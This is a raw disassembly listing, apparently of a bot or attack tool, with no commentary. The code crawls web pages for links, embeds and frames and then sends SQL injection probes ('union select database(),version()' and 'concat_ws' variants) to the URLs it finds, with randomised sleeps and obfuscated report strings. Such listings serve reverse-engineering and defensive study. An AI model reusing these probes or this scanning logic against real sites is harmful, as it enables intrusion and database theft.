jnz loc_41A3D5
push offset aRefresh ; "\"Refresh\""
lea ecx, [ebp-44h]
call sub_41975A
test eax, eax
jz loc_41A3D5
push esi
lea eax, [ebp-58h]
push 3
push eax
lea ecx, [ebp-44h]
call sub_419998
push 3Dh
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 8
call sub_41971C
push eax
lea eax, [ebp-394h]
push eax
lea ecx, [ebp-58h]
call sub_41982A
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 9
call sub_4199B7
lea ecx, [ebp-394h]
mov byte ptr [ebp-4], 8
call sub_4195C9
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_4199B7
lea ecx, [ebp-58h]
call sub_41DA96
dec eax
lea ecx, [ebp-58h]
push eax
lea eax, [ebp-374h]
push ebx
push eax
call sub_419797
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 0Ah
call sub_4199B7
lea ecx, [ebp-374h]
mov byte ptr [ebp-4], 8
call sub_4195C9
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_4199B7
lea eax, [ebp-58h]
lea ecx, [ebp-204h]
push eax
call sub_4195A5
lea eax, [ebp-0ACh]
lea ecx, [ebp-204h]
push eax
mov byte ptr [ebp-4], 0Bh
call sub_4199C6
push eax
call sub_419B88
pop ecx
test eax, eax
pop ecx
jz loc_41A3C2
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41A351
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41A36B
; ---------------------------------------------------------------------------
loc_41A351: ; CODE XREF: .text:0041A336�j
push dword ptr [ebp-6Ch]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41A36B: ; CODE XREF: .text:0041A34F�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-214h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-214h]
call sub_4195C9
loc_41A3C2: ; CODE XREF: .text:0041A326�j
lea ecx, [ebp-204h]
call sub_4195C9
lea ecx, [ebp-58h]
jmp loc_41AF61
; ---------------------------------------------------------------------------
loc_41A3D5: ; CODE XREF: .text:0041A239�j
; .text:0041A24E�j
push offset dword_43DAAC
lea ecx, [ebp-0BCh]
call sub_4196D2
test eax, eax
jnz loc_41A778
push esi
lea eax, [ebp-384h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419998
push edi
lea ecx, [ebp-110h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_419998
lea ecx, [ebp-384h]
jmp short loc_41A47C
; ---------------------------------------------------------------------------
loc_41A41D: ; CODE XREF: .text:0041A497�j
push offset byte_454A34
lea ecx, [ebp-110h]
call sub_4196C2
test eax, eax
jz short loc_41A499
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-304h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push edi
lea ecx, [ebp-244h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Fh
call sub_419998
push eax
lea ecx, [ebp-110h]
mov byte ptr [ebp-4], 10h
call sub_419649
lea ecx, [ebp-244h]
call sub_4195C9
lea ecx, [ebp-304h]
loc_41A47C: ; CODE XREF: .text:0041A41B�j
mov byte ptr [ebp-4], 0Eh
call sub_4195C9
lea ecx, [ebp-110h]
push offset aHref ; "href"
call sub_4196D2
test eax, eax
jnz short loc_41A41D
loc_41A499: ; CODE XREF: .text:0041A42F�j
push offset byte_454A34
lea ecx, [ebp-110h]
call sub_4196C2
test eax, eax
jz loc_41A76D
push esi
lea eax, [ebp-264h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push 1
push edi
lea ecx, [ebp-160h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 11h
call sub_41984D
lea ecx, [ebp-264h]
call sub_4195C9
lea ecx, [ebp-170h]
call sub_419551
push ebx
lea ecx, [ebp-160h]
mov byte ptr [ebp-4], 14h
call sub_4199BC
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-160h]
jnz short loc_41A53A
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-170h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4196E3
add esp, 14h
jmp short loc_41A59A
; ---------------------------------------------------------------------------
loc_41A53A: ; CODE XREF: .text:0041A50A�j
push offset aHttp_0 ; "http://"
call sub_41975A
test eax, eax
jz short loc_41A55C
lea eax, [ebp-160h]
lea ecx, [ebp-170h]
push eax
call sub_419649
jmp short loc_41A59A
; ---------------------------------------------------------------------------
loc_41A55C: ; CODE XREF: .text:0041A546�j
lea ecx, [ebp-160h]
call sub_4199C6
push eax
lea ecx, [ebp-1B0h]
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-170h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4196E3
add esp, 18h
loc_41A59A: ; CODE XREF: .text:0041A538�j
; .text:0041A55A�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-170h]
push eax
call sub_4199C6
push eax
call sub_419B88
pop ecx
test eax, eax
pop ecx
jz loc_41A757
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41A5E1
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41A5FB
; ---------------------------------------------------------------------------
loc_41A5E1: ; CODE XREF: .text:0041A5C6�j
push dword ptr [ebp-6Ch]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41A5FB: ; CODE XREF: .text:0041A5DF�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-364h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-364h]
call sub_4195C9
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSele ; "GET %s=-1+union+select+database(),versi"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-284h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-284h]
call sub_4195C9
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_0 ; "GET %s=-1+union+select+1,2,concat_ws(0x"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-324h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-324h]
call sub_4195C9
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
push dword ptr [ebp+8]
lea ecx, [ebp-68h]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_1 ; "GET %s=-1+union+select+1,2,concat_ws(ch"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-2A4h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-2A4h]
call sub_4195C9
loc_41A757: ; CODE XREF: .text:0041A5B6�j
lea ecx, [ebp-170h]
call sub_4195C9
lea ecx, [ebp-160h]
call sub_4195C9
loc_41A76D: ; CODE XREF: .text:0041A4AB�j
lea ecx, [ebp-110h]
jmp loc_41AF61
; ---------------------------------------------------------------------------
loc_41A778: ; CODE XREF: .text:0041A3E7�j
push offset off_446E18
lea ecx, [ebp-0BCh]
call sub_4196D2
test eax, eax
jnz loc_41AA16
push esi
lea eax, [ebp-3A4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419998
push edi
lea ecx, [ebp-140h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 15h
call sub_419998
lea ecx, [ebp-3A4h]
jmp short loc_41A81F
; ---------------------------------------------------------------------------
loc_41A7C0: ; CODE XREF: .text:0041A83A�j
push offset byte_454A34
lea ecx, [ebp-140h]
call sub_4196C2
test eax, eax
jz short loc_41A83C
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-344h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push edi
lea ecx, [ebp-2C4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 18h
call sub_419998
push eax
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 19h
call sub_419649
lea ecx, [ebp-2C4h]
call sub_4195C9
lea ecx, [ebp-344h]
loc_41A81F: ; CODE XREF: .text:0041A7BE�j
mov byte ptr [ebp-4], 17h
call sub_4195C9
lea ecx, [ebp-140h]
push offset off_446E14
call sub_4196D2
test eax, eax
jnz short loc_41A7C0
loc_41A83C: ; CODE XREF: .text:0041A7D2�j
push offset byte_454A34
lea ecx, [ebp-140h]
call sub_4196C2
test eax, eax
jz loc_41AA0B
push esi
lea eax, [ebp-2E4h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push 1
push edi
lea ecx, [ebp-0E0h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Ah
call sub_41984D
lea ecx, [ebp-2E4h]
call sub_4195C9
lea ecx, [ebp-1A0h]
call sub_419551
push ebx
lea ecx, [ebp-0E0h]
mov byte ptr [ebp-4], 1Dh
call sub_4199BC
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-0E0h]
jnz short loc_41A8DD
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4196E3
add esp, 14h
jmp short loc_41A93D
; ---------------------------------------------------------------------------
loc_41A8DD: ; CODE XREF: .text:0041A8AD�j
push offset aHttp_0 ; "http://"
call sub_41975A
test eax, eax
jz short loc_41A8FF
lea eax, [ebp-0E0h]
lea ecx, [ebp-1A0h]
push eax
call sub_419649
jmp short loc_41A93D
; ---------------------------------------------------------------------------
loc_41A8FF: ; CODE XREF: .text:0041A8E9�j
lea ecx, [ebp-0E0h]
call sub_4199C6
push eax
lea ecx, [ebp-1B0h]
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4196E3
add esp, 18h
loc_41A93D: ; CODE XREF: .text:0041A8DB�j
; .text:0041A8FD�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-1A0h]
push eax
call sub_4199C6
push eax
call sub_419B88
pop ecx
test eax, eax
pop ecx
jz loc_41A9F5
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41A984
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41A99E
; ---------------------------------------------------------------------------
loc_41A984: ; CODE XREF: .text:0041A969�j
push dword ptr [ebp-6Ch]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41A99E: ; CODE XREF: .text:0041A982�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-224h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-224h]
call sub_4195C9
loc_41A9F5: ; CODE XREF: .text:0041A959�j
lea ecx, [ebp-1A0h]
call sub_4195C9
lea ecx, [ebp-0E0h]
call sub_4195C9
loc_41AA0B: ; CODE XREF: .text:0041A84E�j
lea ecx, [ebp-140h]
jmp loc_41AF61
; ---------------------------------------------------------------------------
loc_41AA16: ; CODE XREF: .text:0041A78A�j
push offset aEmbed ; "embed"
lea ecx, [ebp-0BCh]
call sub_4196D2
test eax, eax
jnz loc_41ACB4
push esi
lea eax, [ebp-234h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419998
push edi
lea ecx, [ebp-130h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Eh
call sub_419998
lea ecx, [ebp-234h]
jmp short loc_41AABD
; ---------------------------------------------------------------------------
loc_41AA5E: ; CODE XREF: .text:0041AAD8�j
push offset byte_454A34
lea ecx, [ebp-130h]
call sub_4196C2
test eax, eax
jz short loc_41AADA
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-274h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push edi
lea ecx, [ebp-254h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 21h
call sub_419998
push eax
lea ecx, [ebp-130h]
mov byte ptr [ebp-4], 22h
call sub_419649
lea ecx, [ebp-254h]
call sub_4195C9
lea ecx, [ebp-274h]
loc_41AABD: ; CODE XREF: .text:0041AA5C�j
mov byte ptr [ebp-4], 20h
call sub_4195C9
lea ecx, [ebp-130h]
push offset off_446E14
call sub_4196D2
test eax, eax
jnz short loc_41AA5E
loc_41AADA: ; CODE XREF: .text:0041AA70�j
push offset byte_454A34
lea ecx, [ebp-130h]
call sub_4196C2
test eax, eax
jz loc_41ACA9
push esi
lea eax, [ebp-294h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push 1
push edi
lea ecx, [ebp-150h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 23h
call sub_41984D
lea ecx, [ebp-294h]
call sub_4195C9
lea ecx, [ebp-190h]
call sub_419551
push ebx
lea ecx, [ebp-150h]
mov byte ptr [ebp-4], 26h
call sub_4199BC
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-150h]
jnz short loc_41AB7B
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-190h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4196E3
add esp, 14h
jmp short loc_41ABDB
; ---------------------------------------------------------------------------
loc_41AB7B: ; CODE XREF: .text:0041AB4B�j
push offset aHttp_0 ; "http://"
call sub_41975A
test eax, eax
jz short loc_41AB9D
lea eax, [ebp-150h]
lea ecx, [ebp-190h]
push eax
call sub_419649
jmp short loc_41ABDB
; ---------------------------------------------------------------------------
loc_41AB9D: ; CODE XREF: .text:0041AB87�j
lea ecx, [ebp-150h]
call sub_4199C6
push eax
lea ecx, [ebp-1B0h]
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-190h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4196E3
add esp, 18h
loc_41ABDB: ; CODE XREF: .text:0041AB79�j
; .text:0041AB9B�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-190h]
push eax
call sub_4199C6
push eax
call sub_419B88
pop ecx
test eax, eax
pop ecx
jz loc_41AC93
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41AC22
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41AC3C
; ---------------------------------------------------------------------------
loc_41AC22: ; CODE XREF: .text:0041AC07�j
push dword ptr [ebp-6Ch]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41AC3C: ; CODE XREF: .text:0041AC20�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-2B4h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-2B4h]
call sub_4195C9
loc_41AC93: ; CODE XREF: .text:0041ABF7�j
lea ecx, [ebp-190h]
call sub_4195C9
lea ecx, [ebp-150h]
call sub_4195C9
loc_41ACA9: ; CODE XREF: .text:0041AAEC�j
lea ecx, [ebp-130h]
jmp loc_41AF61
; ---------------------------------------------------------------------------
loc_41ACB4: ; CODE XREF: .text:0041AA28�j
push offset aFrame ; "frame"
lea ecx, [ebp-0BCh]
call sub_4196D2
test eax, eax
jz short loc_41ACE0
push offset aIframe ; "iframe"
lea ecx, [ebp-0BCh]
call sub_4196D2
test eax, eax
jnz loc_41AF66
loc_41ACE0: ; CODE XREF: .text:0041ACC6�j
push esi
lea eax, [ebp-2D4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419998
push edi
lea ecx, [ebp-120h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 27h
call sub_419998
lea ecx, [ebp-2D4h]
jmp short loc_41AD6F
; ---------------------------------------------------------------------------
loc_41AD10: ; CODE XREF: .text:0041AD8A�j
push offset byte_454A34
lea ecx, [ebp-120h]
call sub_4196C2
test eax, eax
jz short loc_41AD8C
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-314h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push edi
lea ecx, [ebp-2F4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ah
call sub_419998
push eax
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 2Bh
call sub_419649
lea ecx, [ebp-2F4h]
call sub_4195C9
lea ecx, [ebp-314h]
loc_41AD6F: ; CODE XREF: .text:0041AD0E�j
mov byte ptr [ebp-4], 29h
call sub_4195C9
lea ecx, [ebp-120h]
push offset off_446E14
call sub_4196D2
test eax, eax
jnz short loc_41AD10
loc_41AD8C: ; CODE XREF: .text:0041AD22�j
push offset byte_454A34
lea ecx, [ebp-120h]
call sub_4196C2
test eax, eax
jz loc_41AF5B
push esi
lea eax, [ebp-334h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419998
push 1
push edi
lea ecx, [ebp-100h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ch
call sub_41984D
lea ecx, [ebp-334h]
call sub_4195C9
lea ecx, [ebp-180h]
call sub_419551
push ebx
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 2Fh
call sub_4199BC
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-100h]
jnz short loc_41AE2D
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-180h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4196E3
add esp, 14h
jmp short loc_41AE8D
; ---------------------------------------------------------------------------
loc_41AE2D: ; CODE XREF: .text:0041ADFD�j
push offset aHttp_0 ; "http://"
call sub_41975A
test eax, eax
jz short loc_41AE4F
lea eax, [ebp-100h]
lea ecx, [ebp-180h]
push eax
call sub_419649
jmp short loc_41AE8D
; ---------------------------------------------------------------------------
loc_41AE4F: ; CODE XREF: .text:0041AE39�j
lea ecx, [ebp-100h]
call sub_4199C6
push eax
lea ecx, [ebp-1B0h]
call sub_4199C6
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_4199C6
push eax
lea eax, [ebp-180h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4196E3
add esp, 18h
loc_41AE8D: ; CODE XREF: .text:0041AE2B�j
; .text:0041AE4D�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-180h]
push eax
call sub_4199C6
push eax
call sub_419B88
pop ecx
test eax, eax
pop ecx
jz loc_41AF45
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41AED4
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4196E3
add esp, 0Ch
jmp short loc_41AEEE
; ---------------------------------------------------------------------------
loc_41AED4: ; CODE XREF: .text:0041AEB9�j
push dword ptr [ebp-6Ch]
call sub_4199C6
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4196E3
add esp, 10h
loc_41AEEE: ; CODE XREF: .text:0041AED2�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_4199C6
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_4199C6
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4196E3
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_4199C6
push eax
lea eax, [ebp-354h]
push eax
call sub_419A4B
add esp, 0Ch
lea ecx, [ebp-354h]
call sub_4195C9
loc_41AF45: ; CODE XREF: .text:0041AEA9�j
lea ecx, [ebp-180h]
call sub_4195C9
lea ecx, [ebp-100h]
call sub_4195C9
loc_41AF5B: ; CODE XREF: .text:0041AD9E�j
lea ecx, [ebp-120h]
loc_41AF61: ; CODE XREF: .text:0041A3D0�j
; .text:0041A773�j ...
call sub_4195C9
loc_41AF66: ; CODE XREF: .text:0041ACDA�j
lea ecx, [ebp-0BCh]
call sub_4195C9
lea ecx, [ebp-44h]
call sub_4195C9
lea ecx, [ebp-0F0h]
call sub_4195C9
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_41B0AD
loc_41AF93: ; CODE XREF: .text:0041A190�j
cmp [ebp-3B4h], ebx
jnz loc_41A195
jmp short loc_41AFB0
; ---------------------------------------------------------------------------
loc_41AFA1: ; CODE XREF: .text:0041A1B3�j
lea ecx, [ebp-0ACh]
mov byte ptr [ebp-4], 3
call sub_41B0AD
loc_41AFB0: ; CODE XREF: .text:0041AF9F�j
mov eax, [ebp-3B8h]
cmp eax, ebx
jnz short loc_41AFCB
push 5265C00h
push 36EE80h
call sub_41E34F
pop ecx
pop ecx
loc_41AFCB: ; CODE XREF: .text:0041AFB8�j
push eax
call dword_43718C ; Sleep
inc dword ptr [ebp-48h]
lea ecx, [ebp-0CCh]
call sub_4195C9
lea ecx, [ebp-20h]
call sub_4195C9
lea ecx, [ebp-30h]
mov [ebp-4], bl
call sub_4195C9
mov eax, [ebp-48h]
cmp eax, [ebp-3C0h]
jl loc_41A0CC
loc_41B002: ; CODE XREF: .text:0041A0BC�j
cmp [ebp-3ACh], ebx
mov edi, offset aQsoz9_vfvwu0 ; "QSOZ9.vFVWu0"
mov esi, offset aSSSU ; "%s %s -> %s:%u"
jnz short loc_41B042
cmp [ebp-3B0h], ebx
jnz short loc_41B04A
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push edi
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CD84
add esp, 1Ch
loc_41B042: ; CODE XREF: .text:0041B012�j
cmp [ebp-3B0h], ebx
jz short loc_41B070
loc_41B04A: ; CODE XREF: .text:0041B01A�j
push dword ptr [ebp-3C4h]
lea eax, [ebp-0C48h]
push eax
push offset aAsqfy_k1uah0 ; "AsQfy.K1uah0"
push edi
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CD0E
add esp, 1Ch
loc_41B070: ; CODE XREF: .text:0041B048�j
push dword ptr [ebp-3C8h]
call sub_42355A
pop ecx
push ebx
call dword_437170 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_41B083 proc near ; CODE XREF: .text:0041A008�p
; .text:0041A19B�p
mov edx, ecx
call sub_419551
lea ecx, [edx+10h]
call sub_419551
lea ecx, [edx+20h]
call sub_419551
lea ecx, [edx+30h]
call sub_419551
lea ecx, [edx+44h]
call sub_419551
mov eax, edx
retn
sub_41B083 endp
; =============== S U B R O U T I N E =======================================
sub_41B0AD proc near ; CODE XREF: .text:0041A083�p
; .text:0041AF8E�p ...
push esi
mov esi, ecx
lea ecx, [esi+44h]
call sub_4195C9
lea ecx, [esi+30h]
call sub_4195C9
lea ecx, [esi+20h]
call sub_4195C9
lea ecx, [esi+10h]
call sub_4195C9
mov ecx, esi
pop esi
jmp sub_4195C9
sub_41B0AD endp
; =============== S U B R O U T I N E =======================================
sub_41B0D8 proc near ; CODE XREF: sub_41984D+132�p
; .text:00436263�j
push esi
mov esi, ecx
push dword ptr [esi+4]
call sub_429006
xor eax, eax
pop ecx
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
pop esi
retn
sub_41B0D8 endp
; =============== S U B R O U T I N E =======================================
sub_41B0F1 proc near ; CODE XREF: sub_41984D+112�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov ecx, [esi+4]
test ecx, ecx
jz short loc_41B10C
mov eax, [esi+8]
sub eax, ecx
sar eax, 2
cmp eax, edi
ja short loc_41B113
loc_41B10C: ; CODE XREF: sub_41B0F1+D�j
mov ecx, esi
call sub_41B12F
loc_41B113: ; CODE XREF: sub_41B0F1+19�j
mov eax, [esi+4]
lea eax, [eax+edi*4]
pop edi
pop esi
retn 4
sub_41B0F1 endp
; =============== S U B R O U T I N E =======================================
sub_41B11E proc near ; CODE XREF: sub_41984D+76�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push dword ptr [ecx+8]
call sub_41B581
retn 4
sub_41B11E endp
; =============== S U B R O U T I N E =======================================
sub_41B12F proc near ; CODE XREF: sub_41B0F1+1D�p
mov eax, offset loc_436514
call sub_42B6FC
sub esp, 30h
mov al, [ebp-0Dh]
push esi
push 0
lea ecx, [ebp-20h]
mov [ebp-20h], al
call sub_41B427
mov esi, offset aInvalidVectorT ; "invalid vector<T> subscript"
push esi
call sub_4292D0
pop ecx
push eax
push esi
lea ecx, [ebp-20h]
call sub_41B45F
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_41B189
lea eax, [ebp-3Ch]
push offset dword_438474
push eax
mov dword ptr [ebp-3Ch], offset off_4373D4
call sub_42B82A
pop esi
sub_41B12F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41B189 proc near ; CODE XREF: sub_41B12F+3F�p
; sub_429011+3F�p ...
mov eax, offset loc_436528
call sub_42B6FC
push ecx
push ecx
push ebx
push esi
lea eax, [ebp-10h]
push edi
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset byte_454A34
call sub_42B8C4
mov ebx, [ebp+8]
and dword ptr [ebp-4], 0
lea edi, [esi+0Ch]
push 0
mov al, [ebx]
mov ecx, edi
mov [edi], al
call sub_41B427
push 0FFFFFFFFh
push 0
push ebx
mov ecx, edi
call sub_41B35A
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_4373C4
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_41B189 endp
; =============== S U B R O U T I N E =======================================
sub_41B1E9 proc near ; DATA XREF: .text:004373A8�o
; .text:004373C8�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_41B1F5
mov eax, offset dword_437338
locret_41B1F5: ; CODE XREF: sub_41B1E9+5�j
retn
sub_41B1E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B1F6 proc near ; DATA XREF: .text:004373CC�o
var_1C = byte ptr -1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
push ecx
lea ecx, [ebp+var_1C]
call sub_41B26C
lea eax, [ebp+var_1C]
push offset dword_4384D8
push eax
